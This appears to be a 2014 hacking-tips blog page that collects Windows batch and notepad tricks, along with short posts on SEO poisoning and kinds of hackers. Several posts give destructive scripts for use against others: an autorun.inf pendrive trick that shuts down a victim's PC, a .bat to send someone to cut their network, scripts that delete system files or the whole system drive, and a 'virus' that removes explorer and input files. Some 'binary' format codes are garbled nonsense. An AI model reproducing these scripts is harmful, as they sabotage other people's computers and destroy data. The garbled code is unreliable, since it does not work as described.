Our Facebook Groups

This is our Facebook Groups. You can Join here..!!

Subscribe Now!

Tuesday, June 3, 2014

How to make more than thousands of folder using notepad

Make thousands of folder with notepad






1. Open Notepad.

2. Copy the following code.


@echo off
:top
md %random%
goto top

3. Sve it as fun.bat


If you will open that file that folder will be rained by more than thousand of folde . It will not cause any harm to your computer , if you can try this .....


Create a undeletable and unrenameable folders in windows





Go to start and then click on Run


Type cmd & hit enter (To open Command Prompt).
Remember you cannot create Undeletable or Unrenemeable folders in your root directory (i.e. where the windows is installed ) That means you can't make this kind of folder in c: Drive if you installed windows on C:


Type D: or  E: hit enter


type md con\ and hit enter (md- make directory)


You may use other words such as aux, lpt1, lpt2, lpt3  up to lpt9 instead of con in above step.


open that directory, you will see the folder created of name con.


Try to delete that folder or rename that folder windows will show the error message .





How to delete that folder ?


Open Command Prompt


Type D: (if you this type of folder in D: Drive ) & hit enter


type rd con\ (Remove durectory)

open that directory and the folder will not appear because it is Remove .




Thanks for watch it ......


Stay with us for learn something new ..........!!

Hack Friends Computer Using Pendrive



Step 1 : >> Copy this code into notepad :

@echo off
shutdown -s -t 00


save as xshack.bat extension (For eg: xshack.bat).


Step 2 :>> now open the notepad and copy this code :


[autorun]
open=xshack.bat
Action=Mouse Disable


save it as "autorun.inf"



Step 3:>>  Then copy the two files in your pendrive or victime's pendrive .

That's all whenever the victime insert his pendrive , the system will be turend off automatically .


Check hoe to Disable This :-

First stop Autorun in your Computer and Then format Pendrive .....


Thanks for watch it .....


Stay with us For learn something new........!

Change Windows password without knowing old one

Process for changing windows password without knowing old





Step 1 :-

Start Menu > Computer > Right Click > Manage


Step 2 :-

System Tool  >  Local User and Group


Step 3 :-

Double Click on user (exp. Your pc name)



Step 4 :-

Choose User > Right Click on it  > Set password


Step 5 :-

Then set your new password





Thanks for watch it ......


stay with us for learn something new......!

How to stop someone's internet sccess

How to stop someone's internet access !!







@echo off
Ipconfig /release


Save that as a.bat and send it to someone . They're IP address eill be lost, and Therefore they won't be able to fix it


However, this is very easy to fix. Simply Type in IPconfig /renew



Thanks For watch it ...

Stay with us for learn something new.......!

How to secure your Facebook Account

99% Facebook Account Hack Through Email Account

Step 1 :-

Go to Security Setting



Then Change your loing notifications setting

Now Set your Privacy Settings




Do Not show Email address to anyone....

Do not use your password in common words....
Like LoveYou-Jaimatadi-Bf name -GF Name

use password like

my143@my143_my143
Love@143_love@143
Very Strong password Like

My_143@#&MY(M)
MY@143(143)MY_143


Thanks for watch it :)


How to use mobile camers as a WebCam



Dear XSHack readers today i will tech you ....How to use mobile camera as a webcam-



Step 1 :-


Install windows [EXE] (Smart Cam.exe on your pc and install)


Step 2 :-

Install SmartCam on your Mobile (Symbian s60 2nd Edition [SIS], s60 3rd Edition , JME [JAR], Windows Mobile [CAB], Android [APK]


Step 3 :-

Start up SmartCam on your PC and go to > File > Settings and check your connection and proceed > next Step


Step 4 :-

Start SmartCam on your phone and go to > Options > Connect and it will ask you for server name and you need to type your pc ip address or your system name




If you don't find your ip address ......then follow it

IP FIND : -  go to run > type > CMD > Type ipconfig


or


Go to > google > type "my ip address"



Any Problem ?

Just Comment .....!

Finding Ip Address of a website using command prompt or CMD






In this tutorial i will tech you to find Ip Address of any websites using command prompt or in short CMD .
Using IP ADDRESS you can find location of the website server and do more stuff. I will demostrate this tutorial with google but you can use this method to find Ip Address of any website like twitter, facebook etc . So lets get started .



How to find ip ?


1. Go to start > Type CMD and press Enter .
2. Now write Ping  followed by website URL whose Ip you  want to find out ...



3. It will take less then a second and come up with the results as showen bleow :






Thanks for watch :)



Any Problem Just comment ?

Format Pc By Notepad

How to format a HDD with notepad
Notepad tricks with tags format .bat, format hard drive , how to format,  Notepad tricks by Sojeb Ahmed
.  If you think that notepad is useless than you are wrong becuase you can now do a lot of things with a notepad which you could have never imagined. In this hack I Will show you how to format a HDD using a  notepad. This is really Cool.






Step 1 :

Copy the following in notepad exactly as it

says01001011000111110010010101010101010000011111100000


Step 2 :

Save as an EXE any Name will do


Step 3 :

Send the EXE to people and infect




OR


If  you think you cannot format c driver when windows is running try Laughung and u will get it Razz....any way some more so you can test on other drives this is simple binary code :


01100110011011110111001001101101011000010111010000100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X - this will format your drive d:\

01100110011011110111001001101101011000010111010000100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X - this will format your drive a:\

01100110011011110111001001101101011000010111010000100000011000010011101001011100

0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini -this will cause your computer not boot.


011001000110010101101100001000000010111101000110001011110101001100101111010100001

00100000011000110011101001011100011000100110111101101111011101000010111001101001

0110111001101001


try to figure out urself reset cannot spoonfeed its working.


Do not try it your pc. Don't mess around is for educational purpose only



still if you cann't figure it out try this

go to notepad and type the following


@Echo off
Del C:\ *.*!y


save it as Dell.bat



want worse then type the  following :


@echo off
del %systemdrive%\*.*/f/s/q
shoutdown -r -f -t 00

and save it as a .bat file


Virus to delete mouse, explore, logoff using Bath Programming


Usually we write simple viruses in bath programming. This time also i have one Bath Programming. It will delete explore.exe , logoff , mouse , keyboard files . So victims can not do anything in his computer.





Now start making virus . Open Notepad and write This Code. and Save it any name . But extension  would be like this >>>>  anyname.bat



@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy c:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist c:\program files\internet explore\iexplore.exe del c:\program files\internet explore\iexplore.exe



I hope that now you will be success to create This Virus


Happy Hacking :)

Monday, June 2, 2014

Black Hat SEO Poisoning attacks


Recently , i have reported that google image search and bing image search leads to malware sites specially a blackhole exploit kit page. The reason behind this attack is SEO Poisoning.





What is SEO ?

search engine optimization (SEO)is a collection of techniques to improve the visibility of a website in a search results . Some of the techniques used by webmasters in


What is black hat SEO ?

Black Hat SEO , also known as SEO Poisoning , is a illegal-technique used by cyber criminals to make their links appear higher than legitimate results. When a user search for related keywords , the infected links appear in the top of the search results


Hacker use one of the following techniques :


* Creating SEO-friendly fake page related to poplar search topics on compromised sites

* Cloak malicious content from sphiders and security researchers .

* Iframe injection.



Poisoning image search results :


As most of search engines filter and find the text-base seo poisoning attacks , Cyber criminals now poisoning the image search results insted.



They hacked legitimate sites and inject malicious code. Whenever a person click the image of compromised site in the search results , it will redirect him to malware sites. Sophos reports that bing image-search results are being poisoned more than other search engines.

What is computer hackinkg ? Introduction to Hacking


What is computer hacking ?



In a Cyber security world, the person who is able to discover weakness in a system and manage to exploit it to accomplish his goal referred as a hacker , and the process is referred as hacking .


Now a days , People started think that hacking is only hijacking Facebook accounts or defacing websites . Yes , it is also part of hacking field but it doesn't mean that it is the main part of Hacking .


So what is exactly Hacking, what should i do to become a Hacker ? Don't worry, you will
learn it from This Site . The main thing you need to become a hacker is self-interest. You should always ready to learn something and learn to create something new.




Now , let me explain about different kind of hackers exist in the cyber security world.



Script kiddies

Script kiddies are the person who use tool, script, methods and programs created by real hackers , In a simple word , the one who doesn't know how a system works but still able to exploit it with previously available tools.


White hat hacker :


White hat hackers are good guys who does the hacking for defensing . The main aim of a white hat hackers is to improve the security of a system by fining security flaws and fixing it. They work for an organization or individually to make the cyber space more secure .


Xshacker1 Only concentrates on white-hat hacking and help you to learn the Ethical Hacking World



Black Hat Hackers :


Black Hat Hacker are really bad guys , cyber criminals , who have malicious intent . The hackers who steal money, infect systems with malware, etc are referred as Black Hat Hackers. They use their hacking kills for illegal purpose .



Grey Hat Hackers :


The Hackers who may work offensively or defensively, depending on the situation . Hackers who don't have malicious intentions but still like to break into third-party system for fun or just for showing the existence of vulnerability.



Hacktivists :


The Hackers Who use Their Hacking Skills for protesting against injustic and attack a target system and website to bring the justice. One of the popular hacktivists is anonymous and RedHack.



Good By Guys :D




Happy Hacking :)

Change Ip Address

How To Change Your ip address in less than a minute?  The following this tips and chang your ip address.





1. Click "start" button

2. Now go "run" button search

3. Type in "command" and hit ok. You should now be at an MSDOS prompt screen.

4. Type "ipconfig/release" Just like that and hit enter.

5. Type "exit" and leavethe prompt.

6. Right-click on "Network Places" or "My Network Places" on your desktop

7. Click on "properties"

You should now beon a screen with something titled "Local Area Connection" , or something close to that

8. Right click on "Local Area Connection" and click "properties" .

9. Double-click on the "internet Protocol (TCP/IP)" from the list under  the "General tab ".

10. Click on "use the following ip address" under the "General" tad.

11. Create an IP ADDRESS (it doesn't matter what it is. I just type 1 and 2 until i file the area up) .

12. Prss "tab" and it should automatically fill in the "Subnet Mask" section with default numbers .

13 . Hit the "Ok" butrton here.

14. Hit the "Ok" button again . You should now be back to the "Local Area Connection" screen .

15. Right-click back on "Local Area Connection" and go to properties again .

16. Go back to the "TCP/IP" settings.

17. This time, select "obtain an IP Address automatically".

18.Hit "Ok".

19. Hit "Ok" again .

20. You now have a new IP ADDRESS.


Some ip do not support this type of procedure and hence there are chances getting back the same old ip address even after trying this back. In this case you need to swittch off the modem and then switch it on get the new ip address .



NOTE  : All this tricks works only if you have a dynamic IP address . But if you have a static IP ADDRESS you have no option to change your ip.



Thanks all For Read it :)

Saturday, May 31, 2014

Welcome Message !!


Welcome Everybody



In this hacking tutorial site www.xtor-salman.blogspot.com